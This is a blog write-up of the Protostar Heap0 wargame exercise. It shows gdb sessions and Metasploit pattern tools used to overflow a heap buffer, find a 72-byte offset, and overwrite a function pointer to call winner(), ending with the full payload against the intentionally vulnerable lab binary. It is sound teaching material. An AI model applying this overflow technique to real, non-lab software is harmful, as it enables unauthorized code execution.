Vulnserver LTER EIP - Reverse Shell

Protostar Heap0 – Brushing up on Heap Exploitation

I haven’t written about any binary exploitation in a while, so I decided to do a write-up for Protostar Heap0 on Exploit Exercises.

Protostar Heap0 – Introduction

I picked Heap0 in particular because I know that my heap skills are definitely lacking when compared to the stack. That, combined with LiveOverflow’s Use-after-free tutorial for Heap2 pushed me towards working through these.

Program Analysis

To start, I downloaded the code from the challenge’s page. I decided to perform everything locally, as I didn’t want to worry about having to download and set up a VM for the time being.

Once I had the code on my machine, I compiled it and took a glance at its basic usage.

[email protected]:~/Documents/exploit-exercises/protostar# gcc -o heap0 -fno-stack-protector -m32 heap0.c 
heap0.c: In function 'main':
heap0.c:32:9: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]
   f->fp = nowinner;
[email protected]:~/Documents/exploit-exercises/protostar# ./heap0 
data is at 0xe4e010, fp is at 0xe4e060
Segmentation fault
[email protected]:~/Documents/exploit-exercises/protostar# ./heap0 'A'
data is at 0x9a2010, fp is at 0x9a2060
level has not been passed


Since name was only a 64 byte buffer, I wanted to see if a 100 character string would overflow it.

[email protected]:~/Documents/exploit-exercises/protostar# gdb heap0 
GNU gdb (Debian 7.11.1-2) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from heap0...(no debugging symbols found)...done.
(gdb) r `python -c 'print "A" * 100'`
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A" * 100'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

As I expected, I was able to overwrite EIP with my A’s. Next I created a pattern to find the appropriate offset for EIP.

[email protected]:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 100

< ... snip ... >

(gdb) r 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
Starting program: /root/Documents/exploit-exercises/protostar/heap0 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

I then loaded my new EIP into pattern_offset and got an offset of 72 characters.

[email protected]kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x41346341 -l 100
[*] Exact match at offset 72

Once I verified that my offset of 72 was correct, I was able to overwrite EIP with my “BBBB” string.

(gdb) r `python -c 'print "A"*72 + "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A"*72 + "BBBB" + "C"*24'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

The only thing left for me to do was obtain the address for the “winner” function, which was as simple as running a print command.

(gdb) print winner
$1 = {<text variable, no debug info>} 0x804849b <winner>

With everything in place, I was able to write my full exploit and pass the level!

[email protected]:~/Documents/exploit-exercises/protostar# ./heap0 `python -c 'print "A"*72 + "\x9b\x84\x04\x08"'`
data is at 0x8d59008, fp is at 0x8d59050
level passed

Protostar Heap0 – Conclusion

While Protostar Heap0 was a simpler exercise, I’m hoping to continue working through the rest of the heap challenges.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM